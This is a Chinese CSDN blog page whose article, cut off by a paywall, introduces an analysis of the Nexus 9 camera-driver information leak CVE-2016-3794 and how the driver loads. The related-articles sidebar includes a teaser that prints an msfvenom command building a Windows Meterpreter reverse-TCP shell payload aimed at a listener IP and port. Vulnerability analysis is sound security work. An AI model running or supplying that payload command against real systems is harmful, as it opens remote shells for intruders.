Nexus 9 摄像头驱动中的信息泄漏漏洞(CVE-2016-3794)分析

最新推荐文章于 2023-01-06 14:11:32 发布
最新推荐文章于 2023-01-06 14:11:32 发布
阅读量1.3k 收藏
点赞数
分类专栏: android
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/ycqzsy/article/details/52061353
版权

前言

最近几个月的谷歌Android安全公告中,第三方驱动的漏洞占据了相当大的比例。由于驱动运行在内核空间,如果它出现问题,将导致非常大的影响。

所以,Android驱动漏洞值得我们去关注,但是这方面的资料缺比较少。本文分析了一个存在于Nexus 9摄像头驱动中的信息泄漏漏洞,首先描述了驱动的加载过程,其次讲解了漏洞的攻击向量,最后结合poc分析了漏洞的成因。

驱动的加载

摄像头驱动的源码位于参考文献[1]。

不同于普通的驱动,摄像头驱动是一个platform driver。它使用module_platform_driver宏作为指定名称的平台设备驱动注册函数和平台设备驱动注销函数。

无标题.png

module_platform_driver最终会调用 platform_driver 结构元素 probe 函数指针,如果想详细了解其过程,请参考文献[2]。

最低0.47元/天 解锁文章
Michael23Star
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
【最新漏洞预警】天王级视频监控产品某华认证绕过漏洞CVE-2021-330*复现与分析
QTcyber的博客
11-12 6126
1.引言 某华是全球占有率排名第二的视频监控品牌。2021年10月,多款摄像产品曝光了认证绕过漏洞,攻击者可利用该漏洞绕过身份验证,获得设备管理权限,可对摄像头进行配置修改、获取配置信息、修改口令、重启设备、添加用户等,危害很高,影响IPC/VTH/VTO/NVR/DVR等主流产品。 2.漏洞复现 根据github上POC的`requirements.txt`搭建环境: sudo pip3 install -r requirements.txt 运行`Console.py`,登陆方式选择`l
Nexus Repository Manager 3(CVE-2019-7238) 远程代码执行漏洞分析和复现
渗透测试研究中心
03-20 737
0x00 漏洞背景 Nexus Repository Manager 3是一款软件仓库,可以用来存储和分发Maven,NuGET等软件源仓库。其3.14.0及之前版本,存在一处基于OrientDB自定义函数的任意JEXL表达式执行功能,而这处功能存在未授权访问漏洞,将可以导致任意命令执行漏洞。2019年2月5日Sonatype发布安全公告,在Nexus Repository Manager 3...
海康摄像头CVE-2021-36260漏洞复现
最新发布
剁椒鱼头没剁椒的博客
01-06 2万+
攻击者利用该漏洞可以用无限制的 root shell 来完全控制设备,即使设备的所有者受限于有限的受保护 shell(psh)。除了入侵 IP 摄像头外,还可以访问和攻击内部网络。该漏洞的利用并不需要用户交互,攻击者只需要访问 http 或 HTTPS 服务器端口(80/443)即可利用该漏洞,无需用户名、密码、以及其他操作。摄像头本身也不会检测到任何登录信息
网络摄像头CVE
weixin_33889665的博客
06-17 505
CVE-2018-9995 rtsp未授权访问 转载于:https://www.cnblogs.com/AtesetEnginner/p/11038980.html
谈Fuzz技术挖掘Android漏洞
一起来捉 Bug 呀~~
03-13 2477
作者:刘朋,NICP国家安全重点实验室成员,CSDN博客专家,2016年博客之星。“白帽子”,如今已经向多家手机厂商,包括Google小米、魅族等提交高危漏洞。另外也主导开发了两款App,其主导开发“妙趣剪纸”已登录苹果体验店。 声明:本文为《程序员》原创文章,未经允许不得转载,更多精彩文章请订阅 2017 年《程序员》 【CSDN 有奖征稿啦】技术之路,共同进步,有优质移动开...
解决 SSL/TLS协议信息泄露漏洞(CVE-2016-2183) ps1 文件
12-26
解决 SSL/TLS协议信息泄露漏洞(CVE-2016-2183) ps1 文件
Windows Server CVE-2016-2183 SSL/TLS协议信息泄露漏洞修复脚本
10-06
Windows Server 合规漏洞修复,修复Windows Server CVE-2016-2183 SSL/TLS协议信息泄露漏洞修复脚本,基于Windows PowerShell, 兼容Windows Server 2016/2019,防止Sweet32 生日攻击
CVE-2016-8655 Linux内核提权漏洞POC
11-18
CVE-2016-8655 Linux内核提权漏洞POC
结合CVE-2019-1040漏洞的两种域提权利用深度分析
systemino的博客
07-03 4057
0x00 漏洞概述 2019年6月,Microsoft发布了一条安全更新。该更新针对CVE-2019-1040漏洞进行修复。此次漏洞,攻击者可以通过间人攻击,绕过NTLM MIC(消息完整性检查)保护,将身份验证流量继到目标服务器。PHP大马 通过这种攻击使得攻击者在仅有一个普通域账号的情况下可以远程控制 Windows 域内的任何机器,包括域控服务器。 0x01 漏洞利...
centOS7.4Wget高危漏洞 CVE-2017-13090 高危、CVE-2017-13089 高危
ky1in93的博客
04-27 3336
简介:GNU Wget是GNU计划开发的一套用于在网络上进行下载的自由软件,它支持通过HTTP、HTTPS以及FTP这三个最常见的TCP/IP协议下载。 GNU Wget 1.19.2之前的版本存在缓冲区溢出漏洞。远程攻击者可利用该漏洞在受影响的应用程序上下文执行任意代码或造成拒绝服务。 解决方案:请直接在漏洞处理页面,选择对应服务器和漏洞,生成修复命令后,登录到服务器上运行即可。使用命令:...
使用Onvif协议进行设备发现以及指定设备信息探测
xcyle的口袋
08-12 1万+
首先,我们要了解Onvif协议,https://www.onvif.org/这里我们之探讨如何使用gsoap进行onvif客户端的开发,关于gsoap的onvif框
CVE-2018-4878 漏洞复现
qq_42039946的博客
05-14 1073
1.生成shellcode msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.8.130 lport=8888 -f python>shellcode.txt lhost的修改为自己kali平台的IP,端口号也可以自行修改 2.查看shellcode root@kali:~# cat shellcode.txt 3.编辑CVE-2018-4878-master.py文件 3.1 替换shellcode 3.2修改swf..
海康威视(Hikvision)大规模代码执行漏洞 数万监控设备存风险
热门推荐
一点一滴积累!
04-01 3万+
1. 更新情况 2014年11月19日,海康威视(Hikvision)监控设备被爆严重漏洞,具体编号为CVE-2014-4878、CVE-2014-4879和CVE-2014-4880。这三个漏洞都是由于Hikvision监控设备对RTSP(实时流传输协议)请求处理不当导致的,通过该漏洞攻击者可以对设备进行DoS,甚至直接获取设备的最高权限。2. 漏洞概要 a) 漏洞描述 海
Android内核打印backtrace的方法
Michael23的专栏
10-27 819
To print the stack contents and a backtrace to the kernel log, use the dump_stack() function in your kernel module. It's declared in linux/kernel.h in the include folder in the kernel source direc
arm32下对象数组的逆向分析
Michael23的专栏
03-17 780
0x0 概述 最近学习arm32的逆向分析,写了一些代码,对照着汇编看。下边分析了对象数组的汇编实现。 0x1 c语言 c语言代码如下:#include class CNumber{ public: CNumber(){ m_nNumber=1; m_fNumber=0.1; }
arm32下根据虚函数识别全局对象
Michael23的专栏
03-23 549
0x0 概述 本文描述了arm32汇编下,如何通过识别虚函数进而实现全局对象的识别。 0x1 c代码 #include class CGlobal{ public: CGlobal(){ printf("CGLoabla \r\n"); }
arm32下继承与多态的逆向分析
Michael23的专栏
03-24 414
0x0 概述 本文分析了arm32下继承与多态在内存的表现形式,得到构造函数和析构函数的另外一个识别条件,并且获得了多态的实现原理。 0x1 c代码 #include class Person{ public: Person(){ printf("Person() \r\n"); } virtual ~Per
Pegasus内核漏洞CVE-2016-4655 & CVE-2016-4656分析与利用详解
"本文主要分析了Pegasus间谍软件利用的两个内核漏洞CVE-2016-4655和CVE-2016-4656,这两个漏洞影响了OSX 10.11.6和iOS 9.3.4版本。文章深入探讨了漏洞的原理和利用技术,特别是对OSUnserializeBinary的二进制反...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值